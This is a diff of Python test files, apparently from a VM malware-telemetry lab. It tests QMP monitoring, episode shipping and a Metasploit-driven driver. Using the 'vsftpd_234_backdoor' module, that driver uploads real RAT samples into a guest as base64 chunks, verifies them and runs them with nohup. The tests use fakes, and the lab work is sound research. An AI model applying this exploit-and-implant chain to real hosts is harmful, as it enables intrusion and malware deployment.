server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"query-status": {"return": {"status": "running", "running": True}},
|
||||
},
|
||||
emit_event_before={"query-status"},
|
||||
)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
out = client.execute("query-status")
|
||||
assert out["running"] is True
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
|
||||
def test_execute_raises_on_qmp_error(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(qmp_server) # no responses → server sends error
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
with pytest.raises(qmp.QMPError):
|
||||
client.execute("totally-fake-command")
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Row builder tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_collect_once_assembles_full_row(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"query-status": {"return": {"status": "running", "running": True}},
|
||||
"query-blockstats": {"return": [{
|
||||
"device": "virtio0",
|
||||
"stats": {
|
||||
"rd_operations": 12, "wr_operations": 4,
|
||||
"rd_bytes": 49152, "wr_bytes": 16384,
|
||||
"flush_operations": 1,
|
||||
},
|
||||
}]},
|
||||
"query-stats": {"return": [{"stats": [
|
||||
{"name": "halt_exits", "value": 17000},
|
||||
{"name": "io_exits", "value": 942},
|
||||
{"name": "string-skipped", "value": "not-an-int"},
|
||||
]}]},
|
||||
},
|
||||
)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
assert row["source"] == "host_qmp"
|
||||
assert row["available_in_deployment"] is False
|
||||
assert row["vm_running"] is True
|
||||
assert row["blockstats"]["virtio0"]["rd_bytes"] == 49152
|
||||
assert row["blockstats"]["virtio0"]["flush_ops"] == 1
|
||||
assert row["kvm_stats"]["halt_exits"] == 17000
|
||||
assert "string-skipped" not in row["kvm_stats"]
|
||||
|
||||
|
||||
def test_collect_once_tolerates_missing_query_stats(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"query-status": {"return": {"status": "running", "running": True}},
|
||||
"query-blockstats": {"return": []},
|
||||
# query-stats deliberately absent → server returns CommandNotFound
|
||||
},
|
||||
)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
row = qmp.collect_once(client, t_mono_origin_ns=time.monotonic_ns())
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
# Older qemu without query-stats: row still exists, kvm_stats absent.
|
||||
assert "kvm_stats" not in row
|
||||
assert row["vm_running"] is True
|
||||
assert row["blockstats"] == {}
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# run_loop tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_run_loop_writes_rows_and_stops_cleanly(qmp_server: Path, tmp_path: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"query-status": {"return": {"status": "running", "running": True}},
|
||||
"query-blockstats": {"return": []},
|
||||
"query-stats": {"error": {"class": "CommandNotFound", "desc": "n/a"}},
|
||||
},
|
||||
)
|
||||
server.start()
|
||||
out_path = tmp_path / "telemetry-qmp.jsonl"
|
||||
stop = threading.Event()
|
||||
|
||||
def stop_after(ms: int) -> None:
|
||||
time.sleep(ms / 1000.0)
|
||||
stop.set()
|
||||
|
||||
threading.Thread(target=stop_after, args=(350,), daemon=True).start()
|
||||
rows = qmp.run_loop(
|
||||
socket_path=qmp_server,
|
||||
output_path=out_path,
|
||||
t_mono_origin_ns=time.monotonic_ns(),
|
||||
interval_ms=100,
|
||||
stop_event=stop,
|
||||
)
|
||||
server.shutdown()
|
||||
|
||||
assert rows >= 2, f"expected >=2 rows, got {rows}"
|
||||
lines = [json.loads(l) for l in out_path.read_text().splitlines()]
|
||||
assert len(lines) == rows
|
||||
for r in lines:
|
||||
assert r["source"] == "host_qmp"
|
||||
assert r["vm_running"] is True
|
||||
|
||||
|
||||
def test_savevm_and_loadvm_via_human_monitor(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"human-monitor-command": {"return": ""},
|
||||
},
|
||||
)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
out_save = client.savevm("baseline")
|
||||
out_load = client.loadvm("baseline")
|
||||
assert out_save == ""
|
||||
assert out_load == ""
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
# Both calls go out as human-monitor-command with the right cmdline.
|
||||
hmcs = [m for m in server.received if m.get("execute") == "human-monitor-command"]
|
||||
cmds = [m["arguments"]["command-line"] for m in hmcs]
|
||||
assert "savevm baseline" in cmds
|
||||
assert "loadvm baseline" in cmds
|
||||
|
||||
|
||||
def test_loadvm_surface_error(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(qmp_server) # no responses → error reply
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
with pytest.raises(qmp.QMPError):
|
||||
client.loadvm("does-not-exist")
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
|
||||
def test_run_loop_returns_zero_when_socket_missing(tmp_path: Path) -> None:
|
||||
# No server bound to the socket path.
|
||||
rows = qmp.run_loop(
|
||||
socket_path=tmp_path / "nonexistent.sock",
|
||||
output_path=tmp_path / "telemetry-qmp.jsonl",
|
||||
t_mono_origin_ns=time.monotonic_ns(),
|
||||
interval_ms=100,
|
||||
stop_event=threading.Event(),
|
||||
)
|
||||
assert rows == 0
|
||||
327
tests/test_shipper.py
Normal file
327
tests/test_shipper.py
Normal file
|
|
@ -0,0 +1,327 @@
|
|||
"""End-to-end shipper tests.
|
||||
|
||||
These run a real Uvicorn server bound to 127.0.0.1 on a free port,
|
||||
hosting the actual receiver Starlette app over an EpisodeStore on a
|
||||
temp dir. The shipper then talks to that server with its real
|
||||
`httpx.Client` — same code path as production. This catches things
|
||||
the receiver-side ASGI tests can't (HTTP framing, header handling,
|
||||
sync httpx behaviour, content-length quirks).
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import socket
|
||||
import threading
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
import httpx
|
||||
import pytest
|
||||
import uvicorn
|
||||
|
||||
from receiver.app import make_app
|
||||
from receiver.store import EpisodeStore
|
||||
from shipper.config import ReceiverEndpoint, ShipperConfig
|
||||
from shipper.queue import ShipperQueue
|
||||
from shipper.transport import ShipperTransport
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Live-receiver fixture
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _free_port() -> int:
|
||||
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
||||
s.bind(("127.0.0.1", 0))
|
||||
return s.getsockname()[1]
|
||||
|
||||
|
||||
class _ServerThread(threading.Thread):
|
||||
def __init__(self, app, port: int) -> None:
|
||||
super().__init__(daemon=True)
|
||||
cfg = uvicorn.Config(
|
||||
app,
|
||||
host="127.0.0.1",
|
||||
port=port,
|
||||
log_level="error",
|
||||
lifespan="off",
|
||||
access_log=False,
|
||||
)
|
||||
self.server = uvicorn.Server(cfg)
|
||||
|
||||
def run(self) -> None:
|
||||
self.server.run()
|
||||
|
||||
def stop(self) -> None:
|
||||
self.server.should_exit = True
|
||||
|
||||
|
||||
def _wait_for_port(port: int, timeout_s: float = 5.0) -> None:
|
||||
deadline = time.monotonic() + timeout_s
|
||||
while time.monotonic() < deadline:
|
||||
try:
|
||||
with httpx.Client(timeout=0.5) as c:
|
||||
r = c.get(f"http://127.0.0.1:{port}/v1/health")
|
||||
if r.status_code == 200:
|
||||
return
|
||||
except httpx.HTTPError:
|
||||
pass
|
||||
time.sleep(0.05)
|
||||
raise TimeoutError(f"receiver on 127.0.0.1:{port} did not come up")
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def store(tmp_path: Path) -> EpisodeStore:
|
||||
return EpisodeStore(
|
||||
store_root=tmp_path / "rcv-episodes",
|
||||
incoming_root=tmp_path / "rcv-incoming",
|
||||
index_path=tmp_path / "rcv-index.jsonl",
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def receiver(store: EpisodeStore):
|
||||
app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token=None)
|
||||
port = _free_port()
|
||||
server = _ServerThread(app, port)
|
||||
server.start()
|
||||
try:
|
||||
_wait_for_port(port)
|
||||
yield f"http://127.0.0.1:{port}", store
|
||||
finally:
|
||||
server.stop()
|
||||
server.join(timeout=2)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def receiver_with_bearer(store: EpisodeStore):
|
||||
app = make_app(store=store, max_episode_bytes=10_000_000, bearer_token="s3cret")
|
||||
port = _free_port()
|
||||
server = _ServerThread(app, port)
|
||||
server.start()
|
||||
try:
|
||||
_wait_for_port(port)
|
||||
yield f"http://127.0.0.1:{port}", store
|
||||
finally:
|
||||
server.stop()
|
||||
server.join(timeout=2)
|
||||
|
||||
|
||||
def _make_shipper(
|
||||
tmp_path: Path,
|
||||
receiver_url: str,
|
||||
*,
|
||||
host_id: str = "lab1",
|
||||
bearer: str | None = None,
|
||||
) -> tuple[ShipperConfig, ShipperTransport, ShipperQueue]:
|
||||
data_root = tmp_path / "lab-data"
|
||||
cfg = ShipperConfig(
|
||||
host_id=host_id,
|
||||
data_root=data_root,
|
||||
receiver=ReceiverEndpoint(url=receiver_url, bearer_token=bearer),
|
||||
scan_interval_s=0.05,
|
||||
)
|
||||
transport = ShipperTransport(cfg)
|
||||
queue = ShipperQueue(cfg, transport)
|
||||
return cfg, transport, queue
|
||||
|
||||
|
||||
def _make_episode(cfg: ShipperConfig, episode_id: str, *, content: bytes = b"data") -> Path:
|
||||
ep = cfg.episodes_dir / episode_id
|
||||
ep.mkdir(parents=True, exist_ok=True)
|
||||
(ep / "meta.json").write_bytes(content)
|
||||
(ep / "events.jsonl").write_text("{}\n")
|
||||
(ep / "labels.jsonl").write_text("{}\n")
|
||||
(ep / "telemetry-proc.jsonl").write_text("{}\n")
|
||||
(ep / "done.marker").touch()
|
||||
return ep
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Ping
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_ping_returns_ok_against_running_receiver(tmp_path: Path, receiver) -> None:
|
||||
url, _ = receiver
|
||||
_, transport, _ = _make_shipper(tmp_path, url)
|
||||
res = transport.ping()
|
||||
assert res.ok is True
|
||||
assert res.status_code == 200
|
||||
assert res.body is not None
|
||||
assert res.body["ok"] is True
|
||||
assert res.body["host_id"] == "lab1"
|
||||
assert res.body["schema_version"] == 1
|
||||
|
||||
|
||||
def test_ping_writes_nothing_to_index(tmp_path: Path, receiver) -> None:
|
||||
url, store = receiver
|
||||
_, transport, _ = _make_shipper(tmp_path, url)
|
||||
transport.ping()
|
||||
transport.ping()
|
||||
transport.ping()
|
||||
assert store.index_path.read_text() == ""
|
||||
|
||||
|
||||
def test_ping_fails_with_wrong_bearer(tmp_path: Path, receiver_with_bearer) -> None:
|
||||
url, _ = receiver_with_bearer
|
||||
_, transport, _ = _make_shipper(tmp_path, url, bearer="WRONG")
|
||||
res = transport.ping()
|
||||
assert res.ok is False
|
||||
assert res.status_code == 401
|
||||
|
||||
|
||||
def test_ping_succeeds_with_right_bearer(tmp_path: Path, receiver_with_bearer) -> None:
|
||||
url, _ = receiver_with_bearer
|
||||
_, transport, _ = _make_shipper(tmp_path, url, bearer="s3cret")
|
||||
res = transport.ping()
|
||||
assert res.ok is True
|
||||
assert res.status_code == 200
|
||||
|
||||
|
||||
def test_ping_fails_when_receiver_unreachable(tmp_path: Path) -> None:
|
||||
# Pick a free port and don't bind it — connect must fail.
|
||||
port = _free_port()
|
||||
_, transport, _ = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
|
||||
res = transport.ping()
|
||||
assert res.ok is False
|
||||
assert res.status_code == 0
|
||||
assert res.error is not None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tar + ship
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_run_once_ships_one_done_episode(tmp_path: Path, receiver) -> None:
|
||||
url, store = receiver
|
||||
cfg, _, queue = _make_shipper(tmp_path, url)
|
||||
_make_episode(cfg, "01EPISODE")
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.scanned == 1
|
||||
assert result.shipped == 1
|
||||
assert result.transient_failures == 0
|
||||
|
||||
# Episode dir moved to shipped/.
|
||||
assert not (cfg.episodes_dir / "01EPISODE").exists()
|
||||
assert (cfg.shipped_dir / "01EPISODE").exists()
|
||||
|
||||
# Outbox tarball cleaned up.
|
||||
assert list(cfg.outbox_dir.iterdir()) == []
|
||||
|
||||
# Receiver stored it and indexed it.
|
||||
assert store.final_path("lab1", "01EPISODE").exists()
|
||||
rows = [json.loads(l) for l in store.index_path.read_text().splitlines()]
|
||||
assert len(rows) == 1
|
||||
assert rows[0]["host_id"] == "lab1"
|
||||
assert rows[0]["episode_id"] == "01EPISODE"
|
||||
|
||||
|
||||
def test_run_once_skips_episodes_without_done_marker(tmp_path: Path, receiver) -> None:
|
||||
url, store = receiver
|
||||
cfg, _, queue = _make_shipper(tmp_path, url)
|
||||
ep = cfg.episodes_dir / "01PARTIAL"
|
||||
ep.mkdir(parents=True)
|
||||
(ep / "meta.json").write_text("{}")
|
||||
# Note: NO done.marker.
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.scanned == 0
|
||||
assert result.shipped == 0
|
||||
assert ep.exists() # untouched
|
||||
assert store.index_path.read_text() == ""
|
||||
|
||||
|
||||
def test_run_once_idempotent_re_ship_returns_already_present(tmp_path: Path, receiver) -> None:
|
||||
"""If a prior run shipped an episode but crashed before retiring it,
|
||||
the next run must re-ship the same bytes successfully (200) and
|
||||
retire the dir, not flag it as a conflict."""
|
||||
url, store = receiver
|
||||
cfg, _, queue = _make_shipper(tmp_path, url)
|
||||
_make_episode(cfg, "01REPLAY", content=b"same-bytes")
|
||||
|
||||
queue.run_once()
|
||||
assert (cfg.shipped_dir / "01REPLAY").exists()
|
||||
|
||||
# Simulate a crash: move it back as if retire never happened.
|
||||
(cfg.shipped_dir / "01REPLAY").rename(cfg.episodes_dir / "01REPLAY")
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.scanned == 1
|
||||
assert result.shipped == 1
|
||||
assert (cfg.shipped_dir / "01REPLAY").exists()
|
||||
|
||||
# Index didn't double up.
|
||||
rows = store.index_path.read_text().splitlines()
|
||||
assert len(rows) == 1
|
||||
|
||||
|
||||
def test_run_once_handles_409_conflict(tmp_path: Path, receiver) -> None:
|
||||
"""If the same episode_id was previously shipped with *different*
|
||||
bytes, the receiver returns 409 and the shipper must NOT retire
|
||||
the local dir — operator triage required."""
|
||||
url, _ = receiver
|
||||
cfg, _, queue = _make_shipper(tmp_path, url)
|
||||
_make_episode(cfg, "01CONFLICT", content=b"first")
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.shipped == 1
|
||||
|
||||
# Simulate a re-do with different content but the same id (e.g., a
|
||||
# botched re-run on the lab host).
|
||||
(cfg.shipped_dir / "01CONFLICT").rename(cfg.episodes_dir / "01CONFLICT")
|
||||
(cfg.episodes_dir / "01CONFLICT" / "meta.json").write_bytes(b"tampered")
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.scanned == 1
|
||||
assert result.shipped == 0
|
||||
assert result.conflicts == 1
|
||||
# Local dir survives — operator can decide what to do.
|
||||
assert (cfg.episodes_dir / "01CONFLICT").exists()
|
||||
|
||||
|
||||
def test_run_once_handles_transient_when_receiver_is_down(tmp_path: Path) -> None:
|
||||
port = _free_port()
|
||||
cfg, _, queue = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
|
||||
_make_episode(cfg, "01DOWN")
|
||||
|
||||
result = queue.run_once()
|
||||
assert result.scanned == 1
|
||||
assert result.shipped == 0
|
||||
assert result.transient_failures == 1
|
||||
# Episode dir + tarball both stay in place for the next pass.
|
||||
assert (cfg.episodes_dir / "01DOWN").exists()
|
||||
assert (cfg.outbox_dir / "01DOWN.tar.zst").exists()
|
||||
|
||||
|
||||
def test_tarball_round_trips_episode_dir(tmp_path: Path, receiver) -> None:
|
||||
"""The receiver-side tarball must extract back to the original
|
||||
episode dir layout (modulo file order). Verifies the tar+zstd
|
||||
pipe is intact."""
|
||||
import subprocess
|
||||
import tarfile
|
||||
|
||||
url, _ = receiver
|
||||
cfg, _, queue = _make_shipper(tmp_path, url)
|
||||
ep = _make_episode(cfg, "01ROUND", content=b"meta-bytes")
|
||||
expected_files = sorted(p.name for p in ep.iterdir())
|
||||
|
||||
queue.run_once()
|
||||
|
||||
# The receiver stored it; pull the bytes back, decompress + untar.
|
||||
rcv_path = next((tmp_path / "rcv-episodes" / "lab1").glob("01ROUND.tar.zst"))
|
||||
decompressed = tmp_path / "01ROUND.tar"
|
||||
subprocess.check_call(
|
||||
["zstd", "-q", "-d", "-o", str(decompressed), str(rcv_path)],
|
||||
)
|
||||
extract_dir = tmp_path / "extracted"
|
||||
extract_dir.mkdir()
|
||||
with tarfile.open(decompressed) as tf:
|
||||
tf.extractall(extract_dir)
|
||||
|
||||
got_files = sorted(p.name for p in (extract_dir / "01ROUND").iterdir())
|
||||
assert got_files == expected_files
|
||||
258
tests/test_tier4.py
Normal file
258
tests/test_tier4.py
Normal file
|
|
@ -0,0 +1,258 @@
|
|||
"""Tests for the Tier-4 path:
|
||||
- real_binary_workload constructs valid shell commands
|
||||
- Sample.binary_path resolves correctly
|
||||
- MSFExploitDriver.real-sample dispatch picks the upload+exec path
|
||||
when a binary is staged, mimic when it isn't
|
||||
- tools/fetch_sample input validation (we don't hit the live API)
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from exploits.driver import DriverConfig, MSFExploitDriver
|
||||
from exploits.modules import load_module_config
|
||||
from exploits.workloads import (
|
||||
chunked_real_binary_upload, real_binary_workload,
|
||||
)
|
||||
from samples.manifest import Sample
|
||||
|
||||
|
||||
REPO_ROOT = Path(__file__).resolve().parent.parent
|
||||
MODULES_DIR = REPO_ROOT / "exploits" / "modules"
|
||||
|
||||
|
||||
# Reuse the FakeMSFRpcClient from test_exploits.py.
|
||||
from tests.test_exploits import FakeMSFRpcClient # noqa: E402
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# real_binary_workload
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_real_binary_workload_embeds_base64() -> None:
|
||||
payload = b"\x7fELF" + b"\x00" * 64 # tiny ELF-shaped header
|
||||
w = real_binary_workload(payload)
|
||||
# Start command bundles a chunked upload (printf '%s' '<b64>' >> file).
|
||||
# Pull all b64 segments out and confirm they round-trip.
|
||||
import base64 as _b64
|
||||
import re
|
||||
matches = re.findall(r"printf '%s' '([A-Za-z0-9+/=]+)'", w.start_cmd)
|
||||
assert matches, "expected printf-based b64 chunks in start_cmd"
|
||||
decoded = _b64.b64decode("".join(matches))
|
||||
assert decoded == payload
|
||||
|
||||
|
||||
def test_chunked_real_binary_upload_splits_correctly() -> None:
|
||||
"""A binary larger than the chunk size should produce >1 chunks
|
||||
plus a finalize + exec. Each chunk's payload must be individually
|
||||
valid base64 and the concatenation must round-trip."""
|
||||
import base64 as _b64
|
||||
import hashlib as _hashlib
|
||||
import re
|
||||
|
||||
# Build a payload large enough to force multiple chunks.
|
||||
payload = (b"\x90\xab" * 8000)
|
||||
plan = chunked_real_binary_upload(payload)
|
||||
assert plan.n_chunks >= 3 # 1 init + 2+ data chunks
|
||||
assert plan.expected_sha256 == _hashlib.sha256(payload).hexdigest()
|
||||
|
||||
# Reconstruct from chunks.
|
||||
segs = []
|
||||
for c in plan.chunks:
|
||||
m = re.search(r"printf '%s' '([A-Za-z0-9+/=]+)'", c)
|
||||
if m:
|
||||
segs.append(m.group(1))
|
||||
assert segs, "no data chunks parsed"
|
||||
decoded = _b64.b64decode("".join(segs))
|
||||
assert decoded == payload
|
||||
|
||||
# finalize_cmd verifies the sha256 we computed.
|
||||
assert plan.expected_sha256 in plan.finalize_cmd
|
||||
assert "sha256sum" in plan.finalize_cmd
|
||||
|
||||
|
||||
def test_real_binary_workload_stop_kills_pidfile() -> None:
|
||||
w = real_binary_workload(b"x" * 16)
|
||||
assert "kill" in w.stop_cmd
|
||||
assert ".cis490-real" in w.stop_cmd
|
||||
|
||||
|
||||
def test_real_binary_workload_per_profile_isolation() -> None:
|
||||
a = real_binary_workload(b"\x00", sample=Sample(name="a", family="A", category="rat", profile="cpu-saturate"))
|
||||
b = real_binary_workload(b"\x00", sample=Sample(name="b", family="B", category="rat", profile="bursty-c2"))
|
||||
# Different profiles → different /tmp paths so concurrent samples
|
||||
# don't stomp each other in the same guest.
|
||||
assert a.profile != b.profile
|
||||
assert a.start_cmd != b.start_cmd
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Sample.binary_path
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_binary_path_resolves_when_staged(tmp_path: Path) -> None:
|
||||
sha = "a" * 64
|
||||
(tmp_path / sha).write_bytes(b"hello")
|
||||
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256=sha)
|
||||
assert s.binary_path(tmp_path) == tmp_path / sha
|
||||
|
||||
|
||||
def test_binary_path_none_when_missing(tmp_path: Path) -> None:
|
||||
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256="b" * 64)
|
||||
assert s.binary_path(tmp_path) is None
|
||||
|
||||
|
||||
def test_binary_path_none_for_mimic_sample(tmp_path: Path) -> None:
|
||||
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
|
||||
assert s.binary_path(tmp_path) is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Driver dispatch
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_driver_picks_real_binary_when_staged(tmp_path: Path) -> None:
|
||||
payload = b"\x7fELF\x02" + b"\x00" * 60
|
||||
sha = hashlib.sha256(payload).hexdigest()
|
||||
(tmp_path / sha).write_bytes(payload)
|
||||
|
||||
sample = Sample(
|
||||
name="real-x", family="X", category="rat",
|
||||
profile="cpu-saturate", sha256=sha,
|
||||
)
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(
|
||||
target_ip="10.200.0.10",
|
||||
session_open_timeout_s=0.5,
|
||||
sample_store_root=tmp_path,
|
||||
),
|
||||
emit_event=lambda *a, **kw: None,
|
||||
sample=sample,
|
||||
)
|
||||
# Driver picks the chunked-upload path.
|
||||
assert driver.workload is not None
|
||||
assert driver.workload.profile.startswith("real:")
|
||||
assert driver._chunked is not None
|
||||
assert driver._chunked.expected_sha256 == sha
|
||||
|
||||
|
||||
def test_driver_walks_chunked_upload_in_session(tmp_path: Path) -> None:
|
||||
"""End-to-end: at infected_running, the driver should issue every
|
||||
chunk + finalize + exec as separate shell_write calls. The fake
|
||||
client records them in order so we can verify."""
|
||||
payload = b"\xde\xad\xbe\xef" * 4096 # 16 KiB → multiple chunks
|
||||
sha = hashlib.sha256(payload).hexdigest()
|
||||
(tmp_path / sha).write_bytes(payload)
|
||||
|
||||
sample = Sample(
|
||||
name="real-multi", family="X", category="rat",
|
||||
profile="bursty-c2", sha256=sha,
|
||||
)
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
|
||||
# Patch the fake to return "sha-ok" so the verify step passes.
|
||||
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
|
||||
client._verify_response = "sha-ok\n"
|
||||
real_read = client.session_shell_read
|
||||
def shell_read_with_verify(sid):
|
||||
# Return verify token after the finalize command — i.e. once
|
||||
# the most recent shell_write contained "sha256sum".
|
||||
last = client.shell_writes[-1][1] if client.shell_writes else ""
|
||||
if "sha256sum" in last:
|
||||
return "sha-ok\n"
|
||||
return real_read(sid)
|
||||
client.session_shell_read = shell_read_with_verify # type: ignore[assignment]
|
||||
|
||||
events: list[tuple[str, dict]] = []
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(
|
||||
target_ip="10.200.0.10",
|
||||
session_open_timeout_s=0.5,
|
||||
sample_store_root=tmp_path,
|
||||
),
|
||||
emit_event=lambda ev, **kw: events.append((ev, kw)),
|
||||
sample=sample,
|
||||
)
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting")
|
||||
driver.set_phase("infected_running")
|
||||
|
||||
# All chunks + finalize + exec went through shell_write.
|
||||
writes = [w for (_, w) in client.shell_writes]
|
||||
n_printf = sum(1 for w in writes if w.startswith("printf '%s'"))
|
||||
n_finalize = sum(1 for w in writes if "sha256sum" in w)
|
||||
n_exec = sum(1 for w in writes if "nohup" in w and ".cis490-real" in w)
|
||||
assert n_printf >= 2, f"expected multiple chunks, saw {n_printf}"
|
||||
assert n_finalize == 1
|
||||
assert n_exec == 1
|
||||
|
||||
# Events tell the same story.
|
||||
names = [e for (e, _) in events]
|
||||
assert "real_binary_upload_begin" in names
|
||||
assert "real_binary_verify" in names
|
||||
assert any(e == "sample_executed" and kw.get("kind") == "real"
|
||||
for (e, kw) in events)
|
||||
|
||||
|
||||
def test_driver_falls_back_to_mimic_when_real_binary_missing(tmp_path: Path) -> None:
|
||||
sample = Sample(
|
||||
name="real-but-missing", family="X", category="rat",
|
||||
profile="bursty-c2", sha256="c" * 64,
|
||||
)
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(
|
||||
target_ip="10.200.0.10",
|
||||
session_open_timeout_s=0.5,
|
||||
sample_store_root=tmp_path, # empty
|
||||
),
|
||||
emit_event=lambda *a, **kw: None,
|
||||
sample=sample,
|
||||
)
|
||||
# Mimic workload selected because the binary isn't staged.
|
||||
assert driver.workload is not None
|
||||
assert driver.workload.profile == "bursty-c2"
|
||||
assert "real:" not in driver.workload.profile
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fetcher input validation
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_fetch_sample_rejects_bad_sha(tmp_path: Path) -> None:
|
||||
from tools.fetch_sample import fetch_sample
|
||||
|
||||
with pytest.raises(ValueError, match="64 hex chars"):
|
||||
fetch_sample("not-a-hash", tmp_path, api_key="x")
|
||||
|
||||
|
||||
def test_fetch_sample_returns_existing_when_hash_matches(tmp_path: Path) -> None:
|
||||
from tools.fetch_sample import fetch_sample
|
||||
|
||||
payload = b"already staged bytes"
|
||||
sha = hashlib.sha256(payload).hexdigest()
|
||||
p = tmp_path / sha
|
||||
p.write_bytes(payload)
|
||||
# api_key is unused on the cached path; pass anything.
|
||||
out = fetch_sample(sha, tmp_path, api_key="ignored")
|
||||
assert out == p
|
||||
# File untouched.
|
||||
assert p.read_bytes() == payload
|
||||
213
tests/test_vm_load_controller.py
Normal file
213
tests/test_vm_load_controller.py
Normal file
|
|
@ -0,0 +1,213 @@
|
|||
"""Tests for VMLoadController against a fake SerialClient.
|
||||
|
||||
The controller's only job is to translate phases into shell commands
|
||||
on a serial console + emit audit events. The key invariants we
|
||||
encode here come from the elliott-lab incident where every phase
|
||||
median'd 20% CPU because the workload silently never fired:
|
||||
|
||||
- every set_phase emits some event (so absence in events.jsonl is
|
||||
a hard signal)
|
||||
- infected_running emits workload_started AFTER sending the load
|
||||
command
|
||||
- dormant emits workload_killed WITH a pre_kill_probe so trainers
|
||||
can detect "the workload was never running"
|
||||
- exceptions in the shell call surface as workload_failed; they
|
||||
do NOT propagate (the runner's on_phase callback would swallow
|
||||
them anyway, but we want the audit row regardless)
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
# Mirror the same path hack run_real_vm_demo.py uses so the tools/
|
||||
# module imports work.
|
||||
ROOT = Path(__file__).resolve().parent.parent
|
||||
sys.path.insert(0, str(ROOT))
|
||||
sys.path.insert(0, str(ROOT / "tools"))
|
||||
|
||||
from samples.manifest import Sample
|
||||
from vm_load_controller import VMLoadController # noqa: E402
|
||||
|
||||
|
||||
class FakeSerial:
|
||||
"""Records every shell command. Returns canned probe output."""
|
||||
|
||||
def __init__(self, probe_response: str = "yes=1\nsh=1\nloadavg=0.45") -> None:
|
||||
self.calls: list[str] = []
|
||||
self.probe_response = probe_response
|
||||
self.fail_on: list[str] = []
|
||||
|
||||
